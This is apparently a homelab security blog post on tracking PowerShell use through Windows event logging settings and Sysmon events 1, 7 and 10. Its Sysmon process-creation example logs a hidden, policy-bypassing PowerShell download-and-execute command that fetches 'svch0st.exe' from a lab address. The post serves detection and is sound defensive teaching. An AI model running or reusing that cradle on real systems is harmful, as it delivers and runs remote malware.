SecurityNguyen
Posts Tags About Categories
SecurityNguyen

Contents

Investigating Powershell Activity

Nguyen Nguyen included in Homelabs
   681 words   4 minutes 

Note: If you need to zoom in, you can click on the image.

In this blog post, we will cover how to track PowerShell activity. Let’s start off with some Windows Event Log.

Logging PowerShell Activity

Majority of the PowerShell logging falls under Computer Configuration -> Policies -> Windows PowerShell.
Here are the options available to us:



Module Logging help with event id: 800 and event id: 4103.

Turn on PowerShell Script Block Logging for event id: 4104.

PowerShell Transcription record everything what the user do within the PowerShell session.
For example: 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

**********************
Windows PowerShell transcript start
Start time: 20240522143937
Username: TESTDUMMY\Administrator
RunAs User: TESTDUMMY\Administrator
Configuration Name: 
Machine: DUMMYC1 (Microsoft Windows NT 10.0.19045.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 17368
PSVersion: 5.1.19041.4412
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.4412
BuildVersion: 10.0.19041.4412
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20240522143956
**********************
PS C:\Users\Administrator> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : testdummy.com
   IPv4 Address. . . . . . . . . . . : 192.168.109.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.109.1

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Window Event Log

Event ID: 4688 Process has been created

Allow us to know when PowerShell was started.

From the picture below, we can see that powershell.exe was started on May 2023, 2024 @ 1:45:35.


Additionally, in Windows, each command you run has it own separate process. As you can see from the picture below,


We see that the process id of powershell.exe (5372) is the parent process id of whoami.exe. What does that mean? That essentially mean that a user used PowerShell and used the whoami command.

Event ID: 400 Powershell Logging

This event ID is similar to event ID: 4688. The only difference is that this event id only track when Powershell.exe is started.
Details:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

Engine state is changed from None to Available. 

Details: 
	NewEngineState=Available
	PreviousEngineState=None

	SequenceNumber=13

	HostName=ConsoleHost
	HostVersion=5.1.19041.4412
	HostId=be286975-3018-400f-b789-f596ce246438
	HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	EngineVersion=5.1.19041.4412
	RunspaceId=a738cd72-eb7d-4c73-80bf-091eea0eaa39
	PipelineId=
	CommandName=
	CommandType=
	ScriptName=
	CommandPath=
	CommandLine=

Event ID: 800 & 4103 Module loading and Add-Type logging

Logs all loaded modules.

Event ID: 4104 Script Block logging

Log the PowerShell script. If a long PowerShell script is run, then it will divide the script into multiple parts.
Example:


Sysmon Events

Event ID: 1 Process Creation

Track when a process have been created and the command line that the process ran.

Example:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

Process Create:
RuleName: technique_id=T1059.001,technique_name=PowerShell
UtcTime: 2024-05-23 19:03:05.132
ProcessGuid: {e58af071-92e9-664f-4204-000000002500}
ProcessId: 18232
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -c "IEX ((New-Object System.Net.Webclient).DownloadString('http://192.168.109.6:9000/svch0st.exe'))"
CurrentDirectory: C:\Users\Administrator\
User: TESTDUMMY\Administrator
LogonGuid: {e58af071-f906-664e-5117-120000000000}
LogonId: 0x121751
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=801262E122DB6A2E758962896F260B55BBD0136A,MD5=2E5A8590CF6848968FC23DE3FA1E25F1,SHA256=9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3,IMPHASH=3D08F4848535206D772DE145804FF4B6
ParentProcessGuid: {e58af071-92d4-664f-4004-000000002500}
ParentProcessId: 16720
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
ParentUser: TESTDUMMY\Administrator

Event ID: 7 Image Loaded

Better source for gaining visibility into PowerShell since it will record any process that runs PowerShell by focusing on the modload for System.Management.Automation.dll and System.Management.Automation.ni.dll.

EventID: 10 Process access another process.

This eventid track when an process access another process.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

Process accessed:
RuleName: technique_id=T1055.001,technique_name=Dynamic-link Library Injection
UtcTime: 2024-05-23 01:55:15.261
SourceProcessGUID: {e58af071-96c2-664f-6e04-000000002500}
SourceProcessId: 19452
SourceThreadId: 14772
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessGUID: {e58af071-ad33-664f-a704-000000002500}
TargetProcessId: 16164
TargetImage: C:\Windows\system32\whoami.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9e9c4|C:\Windows\System32\KERNELBASE.dll+59655|C:\Windows\System32\KERNELBASE.dll+566d6|C:\Windows\System32\KERNEL32.DLL+1cec4|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+3512b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3c09|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3579|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12826a9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1198b2a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12441cd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1243e8b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1319e8f|UNKNOWN(00007FFA3BAC6611)
SourceUser: TESTDUMMY\Administrator
TargetUser: TESTDUMMY\Administrator

Looking above, we see that PowerShell was seen accessing whoami.exe

Updated on 2024-05-23
 FundamentalsPowerShell
Back | Home